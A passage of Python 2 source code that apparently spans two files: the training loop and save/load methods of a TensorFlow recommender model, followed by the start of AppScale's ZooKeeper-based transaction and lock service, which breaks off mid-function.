'pos_item_representation': pos_item_representation,
'margin': self.margin,
'tr': self
}
# Build loss graph
with tf.name_scope('basic_loss'):
self.tf_basic_loss = self.loss_graph_factory.connect_loss_graph(**loss_graph_kwargs) / self.neg_sample_limit
with tf.name_scope('reg_loss'):
# reg_vars = [self.tf_user_representation, neg_items_representation, pos_item_representation]
reg_vars = [self.graph_nodes['item_weights'], self.graph_nodes['user_weights']]
self.tf_weight_reg_loss = self.tf_alpha * sum(tf.nn.l2_loss(weights) for weights in reg_vars)
self.graph_nodes['tf_weight_reg_loss'] = self.tf_weight_reg_loss
with tf.name_scope('loss'):
if use_reg:
print "using l2_reg of weights for part of loss"
self.tf_loss = self.tf_basic_loss + self.tf_weight_reg_loss
else:
self.tf_loss = self.tf_basic_loss
with tf.name_scope('optimizer'):
self.tf_optimizer = tf.train.AdamOptimizer(learning_rate=self.tf_learning_rate).minimize(self.tf_loss)
def trunc_norm(var, name_ending='var'):
            with tf.name_scope('trunc_' + name_ending):
norm = tf.norm(var, axis=1)
norm_truc = tf.maximum(norm, 1.0)
assign = tf.assign(var, var/tf.reshape(norm_truc, shape=(-1,1)))
return tf.reduce_sum(assign)
# do truncate norm like Starspace
with tf.name_scope('trunc_embeds'):
self.graph_nodes['truncat'] = tf.add(trunc_norm(self.graph_nodes['item_weights'], 'item_weights'),
trunc_norm(self.graph_nodes['user_weights'], 'user_weights'),
name='truncate_weights')
def fit(self, interactions, user_features, item_features, epochs=100, learning_rate=0.1, alpha=0.00001,
verbose=False, margin=0.2, negSearchLimit=100, train_threads=None, use_reg=False):
"""
Constructs the TensorRec graph and fits the model.
:param interactions: scipy.sparse matrix, tensorflow.data.Dataset, str, or list
A matrix of interactions of shape [n_users, n_items].
If a Dataset, the Dataset must follow the format used in tensorrec.input_utils.
If a str, the string must be the path to a TFRecord file.
If a list, the list must contain scipy.sparse matrices, tensorflow.data.Datasets, or strs.
:param user_features: scipy.sparse matrix, tensorflow.data.Dataset, str, or list
A matrix of user features of shape [n_users, n_user_features].
If a Dataset, the Dataset must follow the format used in tensorrec.input_utils.
If a str, the string must be the path to a TFRecord file.
If a list, the list must contain scipy.sparse matrices, tensorflow.data.Datasets, or strs.
:param item_features: scipy.sparse matrix, tensorflow.data.Dataset, str, or list
A matrix of item features of shape [n_items, n_item_features].
If a Dataset, the Dataset must follow the format used in tensorrec.input_utils.
If a str, the string must be the path to a TFRecord file.
If a list, the list must contain scipy.sparse matrices, tensorflow.data.Datasets, or strs.
:param epochs: Integer
The number of epochs to fit the model.
:param learning_rate: Float
The learning rate of the model.
:param alpha:
The weight regularization loss coefficient.
:param verbose: boolean
If true, the model will print a number of status statements during fitting.
        :param margin: Float
            The margin used by the loss graph when ranking a positive example against negatives.
        :param negSearchLimit: Integer
            The number of negative examples sampled per positive example.
        :param train_threads: Integer or None
            The number of training threads, or None to use (CPU count - 1).
        :param use_reg: boolean
            If True, L2 regularization of the weights is added to the loss.
        """
start_time = time.time()
session = get_session()
self.neg_sample_limit = negSearchLimit
self.epochs = epochs
if verbose:
logging.info('Processing interaction and feature data')
# Check input dimensions
n_users, n_user_features = user_features.shape
n_items, n_item_features = item_features.shape
print 'n_users, n_user_features, n_items, n_item_features', n_users, n_user_features, n_items, n_item_features
self.n_users = n_users
user_features = user_features.tocsr()
interactions = interactions.tocsr()
item_features = item_features.tocsr()
item_dict = {i: item_features.indices[item_features.indptr[i]:item_features.indptr[i + 1]] for i in
range(item_features.shape[0])}
# Check if the graph has been constructed by checking the dense prediction node
# If it hasn't been constructed, initialize it
if self.memory_var is None:
print 'building tensorflow graph'
self.memory_var = tf.Variable(get_memory() / 1000000000, name='memory', trainable=False)
# Numbers of features are either learned at fit time from the shape of these two matrices or specified at
# TensorRec construction and cannot be changed.
self._build_tf_graph(n_user_features=n_user_features, n_item_features=n_item_features, use_reg=use_reg,
margin=margin, tf_learning_rate=learning_rate, tf_alpha=alpha)
print 'end building tensorflow graph'
queue_input_size = tf.py_func(lambda : get_queue_size(self.queue_input), inp=[], Tout=tf.int64)
queue_output_size = tf.py_func(lambda : get_queue_size(self.queue_output), inp=[], Tout=tf.int64)
session.run(tf.global_variables_initializer(), )
# Build the shared feed dict
# feed_dict = {self.tf_learning_rate: learning_rate,
# self.tf_alpha: calculate_batched_alpha(num_batches=n_users, alpha=alpha),
# self.margin: margin}
with tf.name_scope('log_item_weights'):
variable_summaries(self.graph_nodes['item_weights'], self.prediction_graph_factory.connect_dense_prediction_graph)
with tf.name_scope('log_user_weights'):
variable_summaries(self.graph_nodes['user_weights'])
with tf.name_scope('log_training'):
tf.summary.scalar('basic_loss', tf.reduce_mean(self.tf_basic_loss))
tf.summary.scalar('tf_weight_reg_loss', self.graph_nodes['tf_weight_reg_loss'])
tf.summary.scalar('loss', self.tf_loss)
tf.summary.scalar('memory', self.memory_var)
tf.summary.scalar('valid_neg_num', self.graph_nodes['valid_neg_num'])
tf.summary.scalar('words_cnt', self.graph_nodes['words_cnt'])
tf.summary.scalar('tf_queue_size', self.graph_nodes['q_size'])
tf.summary.scalar('preprocess_input_queue_size', queue_input_size)
tf.summary.scalar('preprocess_output_queue_size', queue_output_size)
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(self.logdir +'/'+time.strftime('%x-%X').replace('/','').replace(':',''),
session.graph,
max_queue=10, flush_secs=30)
coord = tf.train.Coordinator()
self.coord = coord
threads = []
self.queue_input, self.queue_output, self.sub_process = multiple_workers_thread(
            lambda tid, q_in, q_out: self.get_train_example(tid, q_in, q_out,
                user_features, interactions, item_dict, neg_sample_limit=self.neg_sample_limit),
queue_capacity_input=self.queue_input_cap, queue_capacity_output=self.queue_output_cap, n_worker=self.gen_ex_n_worker)
gen_thread = threading.Thread(target=self.gen_user_id, args=(self.queue_input,), name='generate_user_id_thread')
enqueue_threads = [threading.Thread(target=self.enqueue_func, args=(self.queue_output,), name='enqueue tensorflow') for i in range(3)]
# self.active_train_thread += 1
for t in enqueue_threads: t.start()
gen_thread.start()
def train_worker(coord, session, tid):
step = 0
print '*** start running train_worker %s' % tid
while not coord.should_stop():
step += 1
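# When verbose, only worker 0 logs, and only every `log_interval` steps;
# every other step just runs the optimizer without fetching summaries.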
if not verbose or step % self.log_interval or tid != 0:
session.run(self.tf_optimizer)
else:
_, _, loss, summary,q_size = session.run(
[self.memory_var.assign(get_memory() / 10**9), self.tf_optimizer, self.tf_basic_loss,
merged, self.graph_nodes['q_size']]
)
mean_loss = np.mean(loss)
train_writer.add_summary(summary, step)
out_str = '\ttrain: step = {} loss = {}, q_size = {}'.format( step, mean_loss, q_size)
print out_str
self.active_train_thread -= 1
print '--- stop train_worker thread %s ---' % tid
cpu_num = train_threads if train_threads else multiprocessing.cpu_count() - 1
print 'train thread number %s' % cpu_num
train_threads = [threading.Thread(target=train_worker, args=(coord,session,i)) for i in xrange(cpu_num)]
threads.extend(train_threads)
self.active_train_thread = cpu_num # training threads
for t in threads:
t.start()
for t in threads:
t.join()
gen_thread.join()
for t in enqueue_threads: t.join()
stop_subprocess(self.sub_process)
for p in self.sub_process:
p.join()
print '\n--- end of training---'
print 'used time %s' % (time.time() - start_time)
return 0
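# Rough sketch of the training pipeline wired up above (names are the ones
# used in this class; the flow itself is an interpretation, not documented
# behavior):
#
#   gen_user_id --> queue_input --> get_train_example (worker processes)
#                                          |
#                                          v
#                                    queue_output --> enqueue_func (threads)
#                                                            |
#                                                            v
#                                    TensorFlow input queue --> train_worker threads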
def gen_user_id(self, queue_input):
print '* start running gen_user_id, tid=%s' % thread.get_ident()
cnt = 0
session = get_session()
for epoch in range(self.epochs*100000):
users = range(self.n_users)
np.random.shuffle(users)
for u in users:
cnt += 1
if cnt % self.input_step_size == 0:
queue_size = session.run(self.graph_nodes['q_size'])
sys.stdout.write('\tgen_user_id: epoch %3s, cnt %8s, queue_size %3s \n' % (epoch, cnt, queue_size))
if cnt % self.truncate_interval == 0:
norm_sum, item_weights = session.run([self.graph_nodes['truncat'], self.graph_nodes['item_weights']])
print '\tafter truncate, norm_sum %s, min %s, max %s' % (norm_sum, np.min(item_weights), np.max(item_weights))
if self.active_train_thread is not None and self.active_train_thread == 0:
print '- end gen_user_id'
return
if epoch >= self.epochs:
self.coord.request_stop()
u = -1 # subprocess will stop for u < 0
# print 'gen uid %s' % u
try:
queue_input.put(u, timeout=10)
except Exception:
print 'enqueue uid timeout'
print '- end gen_user_id 2'
def enqueue_func(self, queue_output):
print '* start enqueue_func: feed tensorflow queue'
session = get_session()
cnt = 0
while self.active_train_thread != 0:  # keep feeding while training threads are still active
try:
ex = queue_output.get(timeout=5)
cnt += 1
if cnt % 1000 == 0:
print '\tenqueue_func %s, waiting %s' % (cnt, get_queue_size(queue_output))
# Set a 5-second timeout.
run_options = tf.RunOptions(timeout_in_ms=5000)
session.run(self.graph_nodes['enqueue'], options= run_options,
feed_dict={self.tf_user_feature_cols: ex[0],
self.tf_interaction_words_user: ex[1],
self.tf_interaction_words_pos: ex[2],
self.tf_interaction_words_neg: ex[3],
self.tf_interaction_words_neg_len: ex[4]})
except Exception as err:
print 'exception enqueue_func', err
print '- end enqueue_func'
def get_train_example(self, tid, queue_input, queue_output, user_features, interactions, item_dict, neg_sample_limit=100):
item_num = len(item_dict)
print '* start running get_train_example', tid
def get_input(u):
uf = user_features.indices[user_features.indptr[u]:user_features.indptr[u+1]]
ir = interactions.indices[interactions.indptr[u]:interactions.indptr[u+1]]
if len(ir)<2:
print 'not enough interactions'
return None
pos_idx = np.random.randint(len(ir))
words_user = [x for x in itertools.chain.from_iterable([item_dict.get(item, []) for item in ir[pos_idx+1:].tolist()+ir[:pos_idx].tolist()])]
words_pos = item_dict.get(ir[pos_idx], [])
neg_items = filter(lambda l:len(l) > 0, [item_dict.get(x, []) for x in np.random.randint(item_num, size=neg_sample_limit+5)])[:neg_sample_limit]
if len(neg_items) != neg_sample_limit or len(words_user) == 0 or len(words_pos)==0 or len(uf) == 0:
# print "\t\tneg_item/words_user/words_pos has not enough words (%s,%s,%s,pos_idx=%s)" % (len(neg_items),len(words_user), len(words_pos), pos_idx)
return None
words_neg = [x for x in itertools.chain.from_iterable(neg_items)]
words_neg_len = [len(l) for l in neg_items]
return uf, words_user, words_pos, words_neg, words_neg_len
while self.active_train_thread != 0:
try:
u = queue_input.get(timeout=5)
if u<0:
break
# print 'tid %s, u %s' %(tid, u)
r = get_input(u)
if r:
# print 'tid %s, put example u %s' % (tid, u)
queue_output.put(r,timeout=5)
except Exception as err:
print 'get_train_example exception', err
print '- end get_train_example'
def save_model(self, directory_path):
"""
Saves the model to files in the given directory.
:param directory_path: str
The path to the directory in which to save the model.
:return:
"""
if not os.path.exists(directory_path):
os.makedirs(directory_path)
saver = tf.train.Saver()
session_path = os.path.join(directory_path, 'tensorrec_session.cpkt')
saver.save(sess=get_session(), save_path=session_path)
# Break connections to the graph before saving the python object
tensorrec_path = os.path.join(directory_path, 'tensorrec.pkl')
with open(tensorrec_path, 'wb') as file:
pickle.dump(file=file, obj=self)
@classmethod
def load_model(cls, directory_path):
"""
Loads the TensorRec model and TensorFlow session saved in the given directory.
:param directory_path: str
The path to the directory containing the saved model.
:return:
"""
graph_path = os.path.join(directory_path, 'tensorrec_session.cpkt.meta')
saver = tf.train.import_meta_graph(graph_path)
session_path = os.path.join(directory_path, 'tensorrec_session.cpkt')
saver.restore(sess=get_session(), save_path=session_path)
tensorrec_path = os.path.join(directory_path, 'tensorrec.pkl')
with open(tensorrec_path, 'rb') as file:
model = pickle.load(file=file)
return model
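# A minimal usage sketch of the save/load round trip (the directory path and
# the enclosing class name `TensorRec` are assumptions for illustration):
#
#   model.fit(...)
#   model.save_model('/tmp/tensorrec_model')
#   restored = TensorRec.load_model('/tmp/tensorrec_model')
#   # `restored` uses the TensorFlow session restored via get_session().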
|
zktransaction.py
|
#!/usr/bin/python
"""
Distributed id and lock service for transaction support.
"""
import logging
import re
import sys
import threading
import time
import urllib
import kazoo.client
import kazoo.exceptions
class ZKTimeoutException(Exception):
""" A special Exception class that should be thrown if a function is
taking longer than expected by the caller to run
"""
pass
# A list that indicates that the Zookeeper node to create should be readable
# and writable by anyone.
ZOO_ACL_OPEN = None
# The number of seconds to wait before we consider a transaction to be failed.
TX_TIMEOUT = 30
# The number of seconds to wait between invocations of the transaction
# garbage collector.
GC_INTERVAL = 30
# The default port that ZooKeeper runs on.
DEFAULT_PORT = 2181
# The host and port that the Zookeeper service runs on, if none is provided.
DEFAULT_HOST = 'localhost:{}'.format(DEFAULT_PORT)
# The value that we should set for paths whose value we don't care about.
DEFAULT_VAL = "default"
# Paths are separated by this for the tree structure in zookeeper.
PATH_SEPARATOR = "/"
# This is the path which contains the different application's lock meta-data.
APPS_PATH = "/appscale/apps"
# This path contains different transaction IDs.
APP_TX_PATH = "txids"
# This is the node which holds all the locks of an application.
APP_LOCK_PATH = "locks"
APP_ID_PATH = "ids"
APP_TX_PREFIX = "tx"
APP_LOCK_PREFIX = "lk"
APP_ID_PREFIX = "id"
# This is the prefix of all keys which have been updated within a transaction.
TX_UPDATEDKEY_PREFIX = "ukey"
# This is the name of the leaf. It holds a list of locks as a string.
TX_LOCK_PATH = "lockpath"
# The path for blacklisted transactions.
TX_BLACKLIST_PATH = "blacklist"
# This is the path name for valid versions of entities used in a transaction.
TX_VALIDLIST_PATH = "validlist"
GC_LOCK_PATH = "gclock"
GC_TIME_PATH = "gclast_time"
# Lock path for the datastore groomer.
DS_GROOM_LOCK_PATH = "/appscale_datastore_groomer"
# Lock path for the datastore backup.
DS_BACKUP_LOCK_PATH = "/appscale_datastore_backup"
# Lock path for the datastore backup.
DS_RESTORE_LOCK_PATH = "/appscale_datastore_restore"
# A unique prefix for cross group transactions.
XG_PREFIX = "xg"
# Maximum number of groups allowed in cross group transactions.
MAX_GROUPS_FOR_XG = 25
# The separator value for the lock list when using XG transactions.
LOCK_LIST_SEPARATOR = "!XG_LIST!"
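# Putting the constants above together, the per-application ZooKeeper layout
# roughly looks like the following (the app id "guestbook" is a hypothetical
# example):
#
#   /appscale/apps/guestbook/txids/tx0000000001          <- one node per transaction
#   /appscale/apps/guestbook/txids/tx0000000001/lockpath <- lock list for that transaction
#   /appscale/apps/guestbook/txids/tx0000000001/xg       <- present only for XG transactions
#   /appscale/apps/guestbook/txids/blacklist/<txid>      <- failed/expired transactions
#   /appscale/apps/guestbook/txids/validlist/<key>       <- last valid txid per entity key
#   /appscale/apps/guestbook/locks/<root entity key>     <- entity-group locks
#   /appscale/apps/guestbook/ids/...                     <- id allocation counters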
class ZKTransactionException(Exception):
""" ZKTransactionException defines a custom exception class that should be
thrown whenever there was a problem involving a transaction (e.g., the
transaction failed, we couldn't get a transaction ID).
"""
pass
class ZKInternalException(Exception):
""" ZKInternalException defines a custom exception class that should be
thrown whenever we cannot connect to ZooKeeper for an extended amount of time.
"""
pass
class ZKBadRequest(ZKTransactionException):
""" A class thrown when there are too many locks acquired in a XG transaction
or when XG operations are done on a non XG transaction.
"""
pass
class ZKTransaction:
""" ZKTransaction provides an interface that can be used to acquire locks
and other functions needed to perform database-agnostic transactions
(e.g., releasing locks, keeping track of transaction metadata).
"""
# The number of times we should retry ZooKeeper operations, by default.
DEFAULT_NUM_RETRIES = 0
# How long to wait before retrying an operation.
ZK_RETRY_TIME = .5
# The number of seconds to wait before we consider a zk call a failure.
DEFAULT_ZK_TIMEOUT = 3
# When we have this many failures trying to connect to ZK, abort execution.
MAX_CONNECTION_FAILURES = 10
def __init__(self, host=DEFAULT_HOST, start_gc=True):
""" Creates a new ZKTransaction, which will communicate with Zookeeper
on the given host.
Args:
host: A str that indicates which machine runs the Zookeeper service.
start_gc: A bool that indicates if we should start the garbage collector
for timed out transactions.
"""
logging.basicConfig(format='%(asctime)s %(levelname)s %(filename)s:' \
'%(lineno)s %(message)s ', level=logging.INFO)
logging.debug("Started logging")
# Connection instance variables.
self.needs_connection = True
self.failure_count = 0
self.host = host
self.handle = kazoo.client.KazooClient(hosts=host,
max_retries=self.DEFAULT_NUM_RETRIES, timeout=self.DEFAULT_ZK_TIMEOUT)
self.run_with_retry = self.handle.retry
try:
self.handle.start()
self.needs_connection = False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
self.__counter_cache = {}
# for gc
self.gc_running = False
self.gc_cv = threading.Condition()
if start_gc:
self.start_gc()
def start_gc(self):
""" Starts a new thread that cleans up failed transactions.
If called when the GC thread is already started, this causes the GC thread
to reload its GC settings.
"""
logging.info("Starting GC thread")
with self.gc_cv:
if self.gc_running:
self.gc_cv.notifyAll()
else:
self.gc_running = True
self.gcthread = threading.Thread(target=self.gc_runner)
self.gcthread.start()
def stop_gc(self):
""" Stops the thread that cleans up failed transactions.
"""
logging.info("Stopping GC thread")
if self.gc_running:
with self.gc_cv:
self.gc_running = False
self.gc_cv.notifyAll()
self.gcthread.join()
logging.info("GC is done")
def close(self):
""" Stops the thread that cleans up failed transactions and closes its
connection to Zookeeper.
"""
logging.info("Closing ZK connection")
self.stop_gc()
self.handle.stop()
self.handle.close()
def increment_and_get_counter(self, path, value):
""" Increment a counter atomically.
Args:
path: A str of unique path to the counter.
value: An int of how much to increment the counter by.
Returns:
A tuple (int, int) of the previous value and the new value.
Raises:
ZKTransactionException: If it could not increment the counter.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
def clear_counter_from_cache():
""" Deletes a counter from the cache due to an exception being raised.
"""
if path in self.__counter_cache:
del self.__counter_cache[path]
try:
counter = None
if path in self.__counter_cache:
counter = self.__counter_cache[path]
else:
counter = self.handle.Counter(path)
self.__counter_cache[path] = counter
counter.__add__(value)
new_value = counter.value
return new_value - value, new_value
except kazoo.exceptions.ZookeeperError as zoo_exception:
logging.exception(zoo_exception)
clear_counter_from_cache()
raise ZKTransactionException("Couldn't increment path {0} by value {1}" \
.format(path, value))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
clear_counter_from_cache()
raise ZKTransactionException(
"Couldn't increment path {0} with value {1}" \
.format(path, value))
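# Hypothetical illustration: if the counter at `path` currently holds 10,
# increment_and_get_counter(path, 5) returns (10, 15) -- the value before and
# after the atomic increment.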
def get_node(self, path, retries=5):
""" Fetch the ZooKeeper node at the given path.
Args:
path: A PATH_SEPARATOR-separated str that represents the node whose value
should be updated.
retries: The number of times to retry fetching the node.
Returns:
The value of the node.
Raises:
ZKInternalException: If there was an error trying to fetch the node.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
try:
return self.run_with_retry(self.handle.get, path)
except kazoo.exceptions.NoNodeError:
return False
except kazoo.exceptions.ZookeeperError as zoo_exception:
logging.exception(zoo_exception)
if retries > 0:
logging.info('Trying again to fetch node {} with retry #{}'
.format(path, retries))
time.sleep(self.ZK_RETRY_TIME)
return self.get_node(path, retries=retries - 1)
raise ZKInternalException('Unable to fetch node {}'.format(path))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
if retries > 0:
logging.info('Trying again to fetch node {} with retry #{}'
.format(path, retries))
time.sleep(self.ZK_RETRY_TIME)
return self.get_node(path, retries=retries - 1)
raise ZKInternalException('Unable to fetch node {}'.format(path))
def update_node(self, path, value):
""" Sets the ZooKeeper node at path to value, creating the node if it
doesn't exist.
Args:
path: A PATH_SEPARATOR-separated str that represents the node whose value
should be updated.
value: A str representing the value that should be associated with the
updated node.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
logging.debug("Updating node at {0}, with new value {1}".format(path,
value))
try:
self.run_with_retry(self.handle.set, path, str(value))
except kazoo.exceptions.NoNodeError:
try:
self.run_with_retry(self.handle.create, path, str(value), ZOO_ACL_OPEN,
makepath=True)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
except kazoo.exceptions.ZookeeperError as zoo_exception:
logging.exception(zoo_exception)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
def delete_recursive(self, path):
""" Deletes the ZooKeeper node at path, and any child nodes it may have.
Args:
path: A PATH_SEPARATOR-separated str that represents the node to delete.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
try:
children = self.run_with_retry(self.handle.get_children, path)
for child in children:
self.delete_recursive(PATH_SEPARATOR.join([path, child]))
self.run_with_retry(self.handle.delete, path)
except kazoo.exceptions.NoNodeError:
pass
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
def dump_tree(self, path):
""" Prints information about the given ZooKeeper node and its children.
Args:
path: A PATH_SEPARATOR-separated str that represents the node to print
info about.
"""
try:
value = self.run_with_retry(self.handle.get, path)[0]
logging.info("{0} = \"{1}\"".format(path, value))
children = self.run_with_retry(self.handle.get_children, path)
for child in children:
self.dump_tree(PATH_SEPARATOR.join([path, child]))
except kazoo.exceptions.NoNodeError:
logging.info("{0} does not exist.".format(path))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
def get_app_root_path(self, app_id):
""" Returns the ZooKeeper path that holds all information for the given
application.
Args:
app_id: A str that represents the application we wish to get the root
path for.
Returns:
A str that represents a ZooKeeper node, whose immediate children are
the transaction prefix path and the locks prefix path.
"""
return PATH_SEPARATOR.join([APPS_PATH, urllib.quote_plus(app_id)])
def get_transaction_prefix_path(self, app_id):
""" Returns the location of the ZooKeeper node who contains all transactions
in progress for the given application.
Args:
app_id: A str that represents the application we wish to get all
transaction information for.
Returns:
A str that represents a ZooKeeper node, whose immediate children are all
of the transactions currently in progress.
"""
return PATH_SEPARATOR.join([self.get_app_root_path(app_id), APP_TX_PATH])
def get_txn_path_before_getting_id(self, app_id):
""" Returns a path that callers can use to get new transaction IDs from
ZooKeeper, which are given as sequence nodes.
Args:
app_id: A str that represents the application we wish to build a new
transaction path for.
Returns: A str that can be used to create new transactions.
"""
return PATH_SEPARATOR.join([self.get_transaction_prefix_path(app_id),
APP_TX_PREFIX])
def get_transaction_path(self, app_id, txid):
""" Returns the location of the ZooKeeper node who contains all information
for a transaction, and is the parent of the transaction lock list and
registered keys for the transaction.
Args:
app_id: A str that represents the application we wish to get the prefix
path for.
txid: An int that represents the transaction ID whose path we wish to
acquire.
"""
txstr = APP_TX_PREFIX + "%010d" % txid
return PATH_SEPARATOR.join([self.get_app_root_path(app_id), APP_TX_PATH,
txstr])
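# Illustration of the zero-padded naming used above: txid 7 maps to the node
# name "tx0000000007", so e.g. get_transaction_path("guestbook", 7) yields
# "/appscale/apps/guestbook/txids/tx0000000007" (the app id is hypothetical).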
def get_transaction_lock_list_path(self, app_id, txid):
""" Returns the location of the ZooKeeper node whose value is a
XG_LIST-separated str, representing all of the locks that have been acquired
for the given transaction ID.
Args:
app_id: A str that represents the application we wish to get the
transaction information about.
txid: A str that represents the transaction ID we wish to get the lock
list location for.
Returns:
A PATH_SEPARATOR-delimited str corresponding to the ZooKeeper node that
contains the list of locks that have been taken for the given transaction.
"""
return PATH_SEPARATOR.join([self.get_transaction_path(app_id, txid),
TX_LOCK_PATH])
def get_blacklist_root_path(self, app_id):
""" Returns the location of the ZooKeeper node whose children are
all of the blacklisted transaction IDs for the given application ID.
Args:
app_id: A str corresponding to the application whose blacklisted
transaction IDs we want.
Returns:
A str corresponding to the ZooKeeper node whose children are blacklisted
transaction IDs.
"""
return PATH_SEPARATOR.join([self.get_transaction_prefix_path(app_id),
TX_BLACKLIST_PATH])
def get_valid_transaction_root_path(self, app_id):
""" Returns the location of the ZooKeeper node whose children are
all of the valid transaction IDs for the given application ID.
Args:
app_id: A str corresponding to the application whose valid
transaction IDs we want.
Returns:
A str corresponding to the ZooKeeper node whose children are valid
transaction IDs.
"""
return PATH_SEPARATOR.join([self.get_transaction_prefix_path(app_id),
TX_VALIDLIST_PATH])
def get_valid_transaction_path(self, app_id, entity_key):
""" Gets the valid transaction path with the entity key.
Args:
app_id: The application ID.
entity_key: The entity within the path.
Returns:
A str representing the transaction path.
"""
return PATH_SEPARATOR.join([self.get_valid_transaction_root_path(app_id),
urllib.quote_plus(entity_key)])
def get_lock_root_path(self, app_id, key):
""" Gets the root path of the lock for a particular app.
Args:
app_id: The application ID.
key: The key for which we're getting the root path lock.
Returns:
A str of the root lock path.
"""
return PATH_SEPARATOR.join([self.get_app_root_path(app_id), APP_LOCK_PATH,
urllib.quote_plus(key)])
def get_xg_path(self, app_id, tx_id):
""" Gets the XG path for a transaction.
Args:
app_id: The application ID whose XG path we want.
tx_id: The transaction ID whose XG path we want.
Returns:
A str representing the XG path for the given transaction.
"""
txstr = APP_TX_PREFIX + "%010d" % tx_id
return PATH_SEPARATOR.join([self.get_app_root_path(app_id), APP_TX_PATH,
txstr, XG_PREFIX])
def create_node(self, path, value):
""" Creates a new node in ZooKeeper, with the given value.
Args:
path: The path to create the node at.
value: The value that we should store in the node.
Raises:
ZKTransactionException: If the sequence node couldn't be created.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
try:
self.run_with_retry(self.handle.create, path, value=str(value),
acl=ZOO_ACL_OPEN, ephemeral=False, sequence=False, makepath=True)
logging.debug("Created path {0} with value {1}".format(path, value))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't create path {0} with value {1} " \
.format(path, value))
def create_sequence_node(self, path, value):
""" Creates a new sequence node in ZooKeeper, with a non-zero initial ID.
We avoid using zero as the initial ID because Google App Engine apps can
use a zero ID as a sentinel value, to indicate that an ID should be
allocated for them.
Args:
path: The prefix to create the sequence node at. For example, a prefix
of '/abc' would result in a sequence node of '/abc1' being created.
value: The value that we should store in the sequence node.
Returns:
A long that represents the sequence ID.
Raises:
ZKTransactionException: If the sequence node couldn't be created.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
try:
txn_id_path = self.run_with_retry(self.handle.create, path,
value=str(value), acl=ZOO_ACL_OPEN, ephemeral=False, sequence=True,
makepath=True)
if txn_id_path:
txn_id = long(txn_id_path.split(PATH_SEPARATOR)[-1].lstrip(
APP_TX_PREFIX))
if txn_id == 0:
logging.warning("Created sequence ID 0 - deleting it.")
self.run_with_retry(self.handle.delete, txn_id_path)
txn_id_path = self.run_with_retry(self.handle.create, path,
value=str(value), acl=ZOO_ACL_OPEN, ephemeral=False,
sequence=True, makepath=True)
return long(txn_id_path.split(PATH_SEPARATOR)[-1].lstrip(
APP_TX_PREFIX))
else:
logging.debug("Created sequence ID {0} at path {1}".format(txn_id,
txn_id_path))
return txn_id
except kazoo.exceptions.ZookeeperError as zoo_exception:
logging.exception(zoo_exception)
self.reestablish_connection()
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Unable to create sequence node with path" \
" {0}, value {1}".format(path, value))
def get_transaction_id(self, app_id, is_xg=False):
"""Acquires a new id for an upcoming transaction.
Note that the caller must lock particular root entities using acquire_lock,
and that the transaction ID expires after a constant amount of time.
Args:
app_id: A str representing the application we want to perform a
transaction on.
is_xg: A bool that indicates if this transaction operates across multiple
entity groups.
Returns:
A long that represents the new transaction ID.
"""
logging.debug("Getting new transaction id for app {0}, with is_xg set " \
"to {1}".format(app_id, is_xg))
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
timestamp = str(time.time())
# First, make the ZK node for the actual transaction id.
app_path = self.get_txn_path_before_getting_id(app_id)
txn_id = self.create_sequence_node(app_path, timestamp)
# Next, make the ZK node that indicates whether this is an XG transaction.
if is_xg:
xg_path = self.get_xg_path(app_id, txn_id)
self.create_node(xg_path, timestamp)
logging.debug("Returning transaction ID {0} with timestamp {1} for " \
"app_id {2}, with is_xg set to {3}".format(txn_id, timestamp, app_id,
is_xg))
return txn_id
def check_transaction(self, app_id, txid):
""" Gets the status of the given transaction.
Args:
app_id: A str representing the application whose transaction we wish to
query.
txid: An int that indicates the transaction ID we should query.
Returns:
True if the transaction is in progress.
Raises:
ZKTransactionException: If the transaction is not in progress, or it
has timed out.
"""
logging.debug("Checking transaction for app {0}, transaction id {1}".format(
app_id, txid))
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
txpath = self.get_transaction_path(app_id, txid)
try:
if self.is_blacklisted(app_id, txid):
raise ZKTransactionException("Transaction {0} timed out.".format(txid))
except ZKInternalException as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't see if transaction {0} is valid" \
.format(txid))
try:
if not self.run_with_retry(self.handle.exists, txpath):
logging.debug("[check_transaction] {0} does not exist".format(txpath))
raise ZKTransactionException("Transaction {0} is not valid." \
.format(txid))
return True
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't see if transaction {0} is valid" \
.format(txid))
def is_in_transaction(self, app_id, txid, retries=5):
""" Checks to see if the named transaction is currently running.
Args:
app_id: A str representing the application whose transaction we wish to
query.
txid: An int that indicates the transaction ID we should query.
Returns:
True if the transaction is in progress, and False otherwise.
Raises:
ZKTransactionException: If the transaction is blacklisted.
ZKInternalException: If there was an error seeing if the transaction was
blacklisted.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
tx_lock_path = self.get_transaction_lock_list_path(app_id, txid)
if self.is_blacklisted(app_id, txid):
raise ZKTransactionException(
'Transaction {} is blacklisted'.format(txid))
try:
if not self.run_with_retry(self.handle.exists, tx_lock_path):
logging.debug("[is_in_transaction] {0} does not exist".format(
tx_lock_path))
return False
logging.debug("{0} does exist and is not blacklisted".format(
tx_lock_path))
return True
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
if retries > 0:
